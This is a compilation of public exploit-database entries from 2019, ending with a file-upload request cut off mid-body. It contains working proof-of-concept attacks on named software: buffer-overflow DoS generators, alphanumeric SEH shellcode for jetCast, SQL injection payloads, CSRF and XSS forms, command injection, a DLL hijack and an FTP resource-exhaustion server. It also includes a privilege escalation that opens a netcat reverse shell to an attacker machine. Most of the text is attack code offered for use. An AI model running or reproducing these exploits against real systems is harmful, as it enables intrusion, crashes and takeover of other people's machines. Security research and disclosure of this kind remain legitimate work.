ISHACK AI BOT

# -*- coding: utf-8 -*- # Exploit Title: TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC) # Date: 13/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.pixarra.com # Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe # Version: 24.06 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "TwistedBrush_recorder.py", it will create a new file "PoC.txt" # 2.- Copy the text from the generated PoC.txt file to clipboard # 3.- Open TwistedBrush Pro Studio # 4.- Go to 'Record' > 'Script Recorder...' # 5.- Paste clipboard in the 'Description' field # 6.- Click 'Brush' button # 7.- Crashed buffer = "\x41" * 500000 f = open ("PoC.txt", "w") f.write(buffer) f.close()

# -*- coding: utf-8 -*- # Exploit Title: TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC) # Date: 13/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.pixarra.com # Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe # Version: 24.06 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "TwistedBrush_player.py", it will create a new file "sample.srp" # 2.- Open TwistedBrush Pro Studio # 3.- Go to 'Record' > 'Script Player...' # 4.- Click 'Import' button, select the 'sample.srp' file created and click 'Open' button # 5.- Crashed buffer = "\x41" * 500000 f = open ("sample.srp", "w") f.write(buffer) f.close()

# -*- coding: utf-8 -*- # Exploit Title: MP4 Converter 3.25.22 - 'Name' Denial of Service (PoC) # Date: 14/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.tomabo.com/ # Software: http://www.tomabo.com/downloads/mp4-converter-setup.exe # Version: 3.25.22 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "MP4Converter.py", it will create a new file "MP4Converter.txt" # 2.- Copy the text from the generated MP4Converter.txt file to clipboard # 3.- Open MP4 Converter # 4.- Select 'Options' > 'Video/Audio Formats' # 5.- Click 'Add Preset' and paste clipboard in the field 'Name' # 6.- Click 'OK' and click 'Reset All' # 7.- Crashed buffer = "\x41" * 10000 f = open ("MP4Converter.txt", "w") f.write(buffer) f.close()

RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Schneider Electric U.Motion Builder Vendor URL: www.schneider-electric.com Type: OS Command Injection [CWE-78] Date found: 2018-11-15 Date published: 2019-05-13 CVSSv3 Score: 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) CVE: CVE-2018-7841 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Schneider Electric U.Motion Builder 1.3.4 and below 4. INTRODUCTION =============== Comfort, Security and Energy Efficiency – these are the qualities that you as home owner expect from a futureproof building management solution. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The script "track_import_export.php" is vulnerable to an unauthenticated command injection vulnerability when user-supplied input to the HTTP GET/POST parameter "object_id" is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to inject arbitrary commands into a PHP exec call. This is a bypass to the fix implemented for CVE-2018-7765. The following Proof-of-Concept triggers this vulnerability causing a 10 seconds sleep: POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4 Content-Type: application/x-www-form-urlencoded Content-Length: 86 op=export&language=english&interval=1&object_id=`sleep 10` 6. RISK ======= To successfully exploit this vulnerability an unauthenticated attacker must only have network-level access to a vulnerable instance of U.Motion Builder or a product that depends on it. The vulnerability can be used to inject arbitrary OS commands, which leads to the complete compromise of the affected installation. 7. SOLUTION =========== Uninstall/remove the installation. The product has been retired shortly after notifying the vendor about this issue, so no fix will be published. 8. REPORT TIMELINE ================== 2018-11-14: Discovery of the vulnerability 2018-11-14: Tried to notify vendor via their vulnerability report form but unfortunately the form returned some 403 error 2018-11-14: Tried to contact the vendor via Twitter (public tweet and DM) 2018-11-19: No response from vendor 2018-11-20: Tried to contact the vendor via Twitter again 2018-11-20: No response from vendor 2019-01-04: Without further notice the contact form worked again. Sent over the vulnerability details. 2019-01-04: Response from the vendor stating that the affected code is owned by a third-party vendor. Projected completion time is October 2019. 2019-01-10: Scheduled disclosure date is set to 2019-01-22 based on policy. 2019-01-14: Vendor asks to extend the disclosure date to 2019-03-15. 2019-01-15: Agreed on the disclosure extension due to the severity of the issue 2019-02-01: No further reply from vendor. Reminded them of the regular status updates according to the disclosure policy 2019-02-04: Regular status updates from vendor from now on 2019-03-13: Vendor sends draft disclosure notification including assigned CVE-2018-7841. The draft states that the product will be retired and has already been removed from the download portal. A customer notification is published (SEVD-2019-071-02). 2019-03-14: Public disclosure is delayed to give the vendor's customers a chance to remove the product. 2019-05-13: Public disclosure 9. REFERENCES ============= https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day

=========================================================================================== # Exploit Title: PasteShr - SQL İnj. # Dork: N/A # Date: 14-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 # Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html # Version: v1.6 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online. =========================================================================================== # POC - SQLi # Parameters : keyword # Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' # GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: PasteShr - SQL İnj. # Dork: N/A # Date: 14-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 # Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html # Version: v1.6 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online. =========================================================================================== # POC - SQLi # Parameters : password # Attack Pattern : /**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end) # POST Method : http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: PasteShr - SQL İnj. # Dork: N/A # Date: 14-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 # Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html # Version: v1.6 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online. =========================================================================================== # POC - SQLi # Parameters : keyword # Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' # POST Method : http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here] ===========================================================================================

Title: ====== CommSy 8.6.5 - SQL injection Researcher: =========== Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG CVE-ID: ======= CVE-2019-11880 Timeline: ========= 2019-04-15 Vulnerability discovered 2019-04-15 Asked for security contact and PGP key 2019-04-16 Send details to the vendor 2019-05-07 Flaw was approved but will not be fixed in branch 8.6 2019-05-15 Public disclosure Affected Products: ================== CommSy <= 8.6.5 Vendor Homepage: ================ https://www.commsy.net Details: ======== CommSy is a web-based community system, originally developed at the University of Hamburg, Germany, to support learning/working communities. We have discovered a unauthenticated SQL injection vulnerability in CommSy <= 8.6.5 that makes it possible to read all database content. The vulnerability exists in the HTTP GET parameter "cid". Proof of Concept: ================= boolean-based blind: commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823 ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login error-based: commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT COUNT(*),CONCAT(0x716a767871,(SELECT (ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login time-based blind: commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login Fix: ==== According to the manufacturer, the version branch 8.6 is no longer supported and the vulnerability will not be fixed. Customers should update to the newest version 9.2.

<!-- Legrand BTicino Driver Manager F454 1.0.51 CSRF Change Password Exploit Vendor: BTicino S.p.A. Product web page: https://www.bticino.com Affected version: Hardware Platform: F454 Firmware version: 1.0.51 Driver Manager version: 1.1.14 Summary: Audio/video web server for the remote control of the system using web pages or the MY HOME portal. The device can operate as a gateway for the use of the MHVisual and Virtual Configurator software - 6 DIN modules. It replaces item F453 and F453AV. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache/2.2.14 (Unix) OpenSSL/1.0.0d PHP/5.1.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5521 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5521.php 30.04.2019 --> <!-- CSRF PoC web access password change --> <html> <body> <form action="http://192.168.1.66:8080/system/password.save.php" method="POST"> <input type="hidden" name="password1" value="newpass123" /> <input type="hidden" name="password2" value="newpass123" /> <input type="submit" value="Submit request" /> </form> </body> </html> <!-- CSRF PoC OpenWebNet password change --> <html> <body> <form action="http://192.168.1.66:8080/system/ownpassword.save.php" method="POST"> <input type="hidden" name="ownpassword" value="ilegnisi" /> <input type="submit" value="Submit request" /> </form> </body> </html> <!-- Legrand BTicino Driver Manager F454 1.0.51 Authenticated Stored XSS Exploit Vendor: BTicino S.p.A. Product web page: https://www.bticino.com Affected version: Hardware Platform: F454 Firmware version: 1.0.51 Driver Manager version: 1.1.14 Summary: Audio/video web server for the remote control of the system using web pages or the MY HOME portal. The device can operate as a gateway for the use of the MHVisual and Virtual Configurator software - 6 DIN modules. It replaces item F453 and F453AV. Desc: The application suffers from an authenticated stored XSS via GET request. The issue is triggered when input passed via the GET parameter 'server' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache/2.2.14 (Unix) OpenSSL/1.0.0d PHP/5.1.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5522 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5522.php 30.04.2019 --> <!-- Stored XSS via GET request --> <html> <body> <form action="http://192.168.1.66:8080/system/time.ntp.php"> <input type="hidden" name="mode" value="mine" /> <input type="hidden" name="server" value='"><marquee>Waddup.</marquee>' /> <input type="submit" value="Signal" /> </form> </body> </html> <!-- GET http://192.168.1.66:8080/system/time.ntp.php?mode=mine&server="><marquee>Waddup.</marquee> HTTP/1.1 -->

#--------------------------------------------------------- # Title: VMware Workstation DLL hijacking < 15.1.0 # Date: 2019-05-14 # Author: Miguel Mendez Z. & Claudio Cortes C. # Team: www.exploiting.cl # Vendor: https://www.vmware.com # Version: VMware Workstation Pro / Player (Workstation) # Tested on: Windows Windows 7_x86/7_x64 [eng] # Cve: CVE-2019-5526 #--------------------------------------------------------- Description: VMware Workstation contains a DLL hijacking issue because some DLL. DLL Hijacking: shfolder.dll Hooking: SHGetFolderPathW() ------Code_Poc------- #include "dll.h" #include <windows.h> DLLIMPORT void SHGetFolderPathW() { MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION); exit(0); } -------------------------- https://www.vmware.com/security/advisories/VMSA-2019-0007.html

=========================================================================================== # Exploit Title: DeepSound 1.0.4 - SQL Inj. # Dork: N/A # Date: 15-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website! =========================================================================================== # POC - SQLi # Parameters : search_keyword # Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199 # POST Method : http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: DeepSound 1.0.4 - SQL Inj. # Dork: N/A # Date: 15-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website! =========================================================================================== # POC - SQLi # Parameters : description # Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0) --%20 # POST Method : http://localhost/Script/admin?id=&description=[TEXT INPUT]2350265[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: DeepSound 1.0.4 - SQL Inj. # Dork: N/A # Date: 15-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470 # Version: v1.0.4 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: DeepSound is a music sharing script, DeepSound is the best way to start your own music website! =========================================================================================== # POC - SQLi # Parameters : password # Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199 # POST Method : http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL Inject Here] =========================================================================================== ###########################################################################################

# Exploit Title: DoS Wechat with an emoji # Date: 16-May-2019 # Exploit Author: Hong Nhat Pham # Vendor Homepage: http://www.tencent.com/en-us/index.html # Software Link: https://play.google.com/store/apps/details?id=com.tencent.mm # Version: 7.0.4 # Tested on: Android 9.0 # CVE : CVE-2019-11419 Description: vcodec2_hls_filter in libvoipCodec_v7a.so in WeChat application for Android results in a DoS by replacing an emoji file (under the /sdcard/tencent/MicroMsg directory) with a crafted .wxgf file. Crash-log is provided in poc.zip file at https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS Vulnerability Type: Denial of Service Vendor of Product: Tencent Affected Product Code Base: WeChat for Android - Up to latest version (7.0.4) Affected Component: Function vcodec2_hls_filter in libvoipCodec_v7a.so Attack Type: Local Attack vector: An malware app can crafts a malicious emoji file and overwrites the emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID]. Once the user opens any chat messages that contain an emoji, WeChat will instantly crash. POC: Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU User must have sent or received a GIF file in WeChat Malware app must retrieve the phone’s IMEI. For POC, we can use the below command adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed '1 d' | tr -d '.' | awk '{print}' ORS=- Produce the malicious emoji file with the retrieved IMEI (use encrypt_wxgf.py in poc.zip): python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD] Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the padded out.wxgf.encrypted WeChat will crash now if a message that contains the overwritten emoji file Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46853.zip

# Title: JetAudio jetCast Server 2.0 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow # Date: May 13th, 2019 # Author: Connor McGarr (https://connormcgarr.github.io) # Vendor Homepage: http://www.jetaudio.com/ # Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe # Version v2.0 # Tested on: Windows XP SP3 EN # TO RUN: # 1. Run python script # 2. Copy contents of pwn.txt # 3. Open jetCast # 4. Select Config # 5. Paste contents of pwn.txt into "Log directory" field # 6. Click "OK" # 7. Click "Start" # For zeroing out registers before manual shellcode zero = "\x25\x01\x01\x01\x01" # and eax, 0x01010101 zero += "\x25\x10\x10\x10\x10" # and eax, 0x10101010 # Save old stack pointer restore = "\x54" # push esp restore += "\x59" # pop ecx restore += "\x51" # push ecx # Align the stack to 0012FFAD. Leaving enough room for shell. Using calc.exe for now. # 4C4F5555 4C4F5555 4D505555 alignment = "\x54" # push esp alignment += "\x58" # pop eax alignment += "\x2d\x4c\x4f\x55\x55" # and eax, 0x4C4F5555 alignment += "\x2d\x4c\x4f\x55\x55" # and eax, 0x4C4F5555 alignment += "\x2d\x4d\x50\x55\x55" # and eax, 0x4D505555 alignment += "\x50" # push eax alignment += "\x5c" # pop esp # calc.exe - once again, giving you enough room with alignment for shell. Calc.exe for now. # 2C552D14 01552D14 01562E16 shellcode = zero shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14 shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14 shellcode += "\x2d\x16\x2e\x56\x01" # sub eax, 0x01562E16 shellcode += "\x50" # push eax # 24121729 24121739 2414194A shellcode += zero shellcode += "\x2d\x29\x17\x12\x24" # sub eax, 0x24121729 shellcode += "\x2d\x39\x17\x12\x24" # sub eax, 0x24121739 shellcode += "\x2d\x4a\x19\x14\x24" # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A) shellcode += "\x50" # push eax # 34313635 34313434 34313434 shellcode += zero shellcode += "\x2d\x35\x36\x31\x34" # sub eax, 0x34313635 shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434 shellcode += "\x2d\x34\x34\x31\x34" # sub eax, 0x34313434 shellcode += "\x50" # push eax # 323A1245 323A1245 333A1245 shellcode += zero shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245 shellcode += "\x2d\x45\x12\x3a\x32" # sub eax, 0x323A1245 shellcode += "\x2d\x45\x12\x3a\x33" # sub eax, 0x333A1245 shellcode += "\x50" # push eax # Restore old stack pointer. MOV ECX,ESP move = zero move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x403F2711 move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711 move += "\x2d\x3f\x3f\x28\x11" # sub eax, 0x3F3F2811 move += "\x50" # push eax payload = "\x41" * 520 payload += "\x70\x06\x71\x06" # JO 6 bytes. If jump fails, default to JNO 6 bytes into shellcode. payload += "\x2d\x10\x40\x5f" # pop pop ret MFC42.DLL payload += "\x41" * 2 # Padding to reach first instruction payload += restore payload += alignment payload += shellcode payload += move # Using ECX for holding old ESP. \x41 = INC ECX # so using \x42 = INC EDX instead. payload += "\x42" * (5000-len(payload)) f = open('pwn.txt', 'w') f.write(payload) f.close()

#Exploit Title: ZOC Terminal v7.23.4 - 'Script' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-15 #Vendor Homepage: https://www.emtec.com #Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe #Tested Version: 7.23.4 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: ZOC_Terminal_scr.py and it will create a new file "exp.zrx" #2.- Open ZOC Terminal #3.- Select Script > Start REXX Script... #4.- Select "exp.zrx" file and click "open" #5.- Crashed cod = "\x41" * 20000 f = open('exp.zrx', 'w') f.write(cod) f.close()

#Exploit Title: ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-15 #Vendor Homepage: https://www.emtec.com #Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe #Tested Version: 7.23.4 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: ZOC_Terminal_pkf.py #2.- Open zoc_pkf.txt and copy content to clipboard #3.- Open ZOC Terminal #4.- Select File > Create SSH Key Files... #5.- Select "Private key file:" field erease and Paste ClipBoard #6.- Click on "Create public/private key files..." #7.- Crashed cod = "\x41" * 2000 f = open('zoc_pkf.txt', 'w') f.write(cod) f.close()

#Exploit Title: ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-15 #Vendor Homepage: https://www.emtec.com #Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe #Tested Version: 7.23.4 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: ZOC_Terminal_sh.py #2.- Open zoc_sh.txt and copy content to clipboard #3.- Open ZOC Terminal #4.- Select Options > Program Settings... > Special Files #5.- Select "Shell" field erease the content and Paste ClipBoard #6.- Click on "Save" #7.- Select View > "Command Shell" and select "ok" #8.- Crashed cod = "\x41" * 270 f = open('zoc_sh.txt', 'w') f.write(cod) f.close()

#Exploit Title: Axessh 4.2 'Log file name' - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-14 #Vendor Homepage: http://www.labf.com #Software Link: http://www.labf.com/download/axessh.exe #Tested Version: 4.2 #Tested on: Windows 7 Service Pack 1 x32 #Steps to produce the crash: #1.- Run python code: Axessh_4.2.py #2.- Open Axess.txt and copy content to clipboard #3.- Open Axessh.exe #4.- In "Telnet Connect Host" select "Details>>" > "Settings" #5.- Select "Logging" and enable "Log all sessions output" #6.- In "Log file name" paste Clipboard #7.- Select "OK" and in "Telnet Connect Host" select "Ok" #8.- Crashed cod = "\x41" * 500 f = open('Axess.txt', 'w') f.write(cod) f.close()

#!/usr/bin/env python # coding: utf8 # # # SEL AcSELerator Architect 2.2.24 Remote CPU Exhaustion Denial of Service # # # Vendor: Schweitzer Engineering Laboratories, Inc. # Product web page: https://www.selinc.com # Affected version: 2.2.24.0 (ICD package version: 2.38.0) # # Summary: Substation communications networks using the IEC 61850 # MMS and GOOSE protocols require a systemic methodology to configure # message publications and subscriptions. acSELerator Architect # SEL-5032 Software is a Microsoft Windows application that streamlines # the configuration and documentation of IEC 61850 control and SCADA # communications. # # Description: AcSELerator Architect is prone to a denial-of-service (DoS) # vulnerability. An attacker may exploit this issue to cause CPU exhaustion, # resulting in application rendered non-responsive (AppHangB1 event). # # Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # # Advisory: https://applied-risk.com/index.php/download_file/view/106/165 # ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-18-191-02 # CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10608 # # 22.02.2018 # from pwn import * cool_data = '\x4A' * 54321 def bunn(): print """ #################################### SEL AcSELerator Architect 2.2.24.0 FTP Client Remote CPU Exhaustion (c) 2018 #################################### """ def main(): p = listen(2121) try: log.warn('Payload ready for deployment...(Ctrl-C for exit)\n') while True: p.wait_for_connection() if p: sys.stdout.write('▓≡') p.send(cool_data) except KeyboardInterrupt: p.success('OK!') p.close() except EOFError: print "Unexpected error brah:", sys.exc_info()[0] p.close() if __name__ == '__main__': bunn() main()

# -*- coding: utf-8 -*- # Exploit Title: Sandboxie 5.30 - Denial of Service (PoC) # Date: 16/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: https://www.sandboxie.com # Software https://www.sandboxie.com/SandboxieInstall.exe # Version: 5.30 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script 'Sandboxie.py', it will create a new file 'Sandboxie.txt' # 2.- Copy the text from the generated Sandboxie.txt file to clipboard # 3.- Open Sandboxie Control # 4.- Go to 'Configure' > 'Programs Alerts' # 5.- Click 'Add Program', paste clipboard in the field 'Select or enter a program' and click 'OK' # 6.- Click 'OK' and crashed buffer = "\x41" * 5000 f = open ("Sandboxie.txt", "w") f.write(buffer) f.close()

# -*- coding: utf-8 -*- # Exploit Title: CEWE PHOTO SHOW 6.4.3 - Denial of Service (PoC) # Date: 16/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: https://cewe-photoworld.com/ # Software: https://cewe-photoworld.com/creator-software/windows-download # Version: 6.4.3 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script 'photoshow.py', it will create a new file 'photoshow.txt' # 2.- Copy the text from the generated photoshow.txt file to clipboard # 3.- Open CEWE PHOTO SHOW # 4.- Click 'Upload' # 5.- Paste clipboard in the field 'Password' and crashed buffer = "\x41" * 5000 f = open ("photoshow.txt", "w") f.write(buffer) f.close()

# -*- coding: utf-8 -*- # Exploit Title: CEWE PHOTO IMPORTER 6.4.3 - Denial of Service (PoC) # Date: 16/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: https://cewe-photoworld.com/ # Software: https://cewe-photoworld.com/creator-software/windows-download # Version: 6.4.3 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script 'photoimporter.py',it will create a new file "sample.jpg" # 2.- Open CEWE PHOTO IMPORTER # 3.- Select the 'sample.jpg' file created and click 'Import all' # 4.- Click 'Next' and 'Next', you will see a crash buffer = "\x41" * 500000 f = open ("sample.jpg", "w") f.write(buffer) f.close()

Exploit Author: bzyo Twitter: @bzyo_ Exploit Title: Iperius Backup 6.1.0 - Privilege Escalation Date: 04-24-19 Vulnerable Software: Iperius Backup 6.1.0 Vendor Homepage: https://www.iperiusbackup.com/ Version: 6.1.0 Software Link: https://www.iperiusbackup.com/download.aspx Tested on: Windows 10 x64 Details: Iperius Backup Service must run as Local System or a system administrator. By default the application allows for low privilege users to create/run backup jobs and edit existing jobs due to file permissions. An option when creating a backup job is to run a program before or after the backup job. The backup job is run as the user of the running service, as such the program requested to run before or after a backup job is run as that same user. A low privilege user could abuse this and escalate their privileges to either local system or an administrator account. Vendor Post - Installation as Windows service: what it is and why it’s important https://www.iperiusbackup.net/en/installation-windows-service-iperius-backup/ Prerequisites: To successfully exploit this vulnerability, an attacker must already have local access to a system running Iperius Backup and Iperius Backup Service using a low privileged user account Exploit: 1. Login as low privilege user where Iperius Backup and Iperius Backup Service are installed 2. Download netcat from attacking machine c:\users\low\downloads\nc.exe 3. Create batch file calling netcat and sending command prompt to attacking machine c:\users\low\desktop\evil.bat @echo off c:\users\low\downloads\nc.exe 192.168.0.163 443 -e cmd.exe 4. Setup listener on attacking machine nc -nlvvp 443 5. Open Iperius Backup and create new backup job - set any folder to backup (c:\temp) - set to any destination (c:\users\low\desktop) - set program to run before backup job (c:\users\low\desktop\evil.bat) 6. Right-click on newly created job and select "Run backup service as" - will either be local system or administrator account 7. Command prompt on attacking machine will appear C:\Program Files (x86)\Iperius Backup>whoami whoami <computer name>\<administrator> Or C:\Program Files (x86)\Iperius Backup>whoami whoami nt authority\system Risk: The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System or Administrator Notes: Able to open elevated command prompt locally if service is running as local system, but not when using an administrator account. Also able to backup entire administrator user profile as low privilege account. Fix: Remove Everyone permission to folder c:\ProgramData\IperiusBackup

# Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution # Date: May 2019 # Exploit Author: Numan Türle # Vendor Homepage: https://www.interspire.com # Software Link: https://www.interspire.com/emailmarketer # Version: 6.20< # Tested on: windows # CVE : CVE-2018-19550 # https://medium.com/@numanturle/interspire-email-marketer-6-20-exp-remote-code-execution-via-uplaod-files-27ef002ad813 surveys_submit.php if (isset($_FILES['widget']['name'])) { $files = $_FILES['widget']['name']; foreach ($files as $widgetId => $widget) { foreach ($widget as $widgetKey => $fields) { foreach ($fields as $fieldId => $field) { // gather file information $name = $_FILES['widget']['name'][$widgetId]['field'][$fieldId]['value']; $type = $_FILES['widget']['type'][$widgetId]['field'][$fieldId]['value']; $tmpName = $_FILES['widget']['tmp_name'][$widgetId]['field'][$fieldId]['value']; $error = $_FILES['widget']['error'][$widgetId]['field'][$fieldId]['value']; $size = $_FILES['widget']['size'][$widgetId]['field'][$fieldId]['value']; // if the upload was successful to the temporary folder, move it if ($error == UPLOAD_ERR_OK) { $tempdir = TEMP_DIRECTORY; $upBaseDir = $tempdir . DIRECTORY_SEPARATOR . 'surveys'; $upSurveyDir = $upBaseDir . DIRECTORY_SEPARATOR . $formId; $upDir = $upSurveyDir . DIRECTORY_SEPARATOR . $response->GetId(); // if the base upload directory doesn't exist create it if (!is_dir($upBaseDir)) { mkdir($upBaseDir, 0755); } if (!is_dir($upSurveyDir)) { mkdir($upSurveyDir, 0755); } // if the upload directory doesn't exist create it if (!is_dir($upDir)) { mkdir($upDir, 0755); } // upload the file move_uploaded_file($tmpName, $upDir . DIRECTORY_SEPARATOR . $name); } } } } } input file name : widget[0][field][][value] submit : surveys_submit.php?formId=1337 POST /iem/surveys_submit.php?formId=1337 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF2dckZgrcE306kH2 Content-Length: 340 ------WebKitFormBoundaryF2dckZgrcE306kH2 Content-Disposition: form-data; name="widget[0][field][][value]"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryF2dckZgrcE306kH2 Content-Disposition: 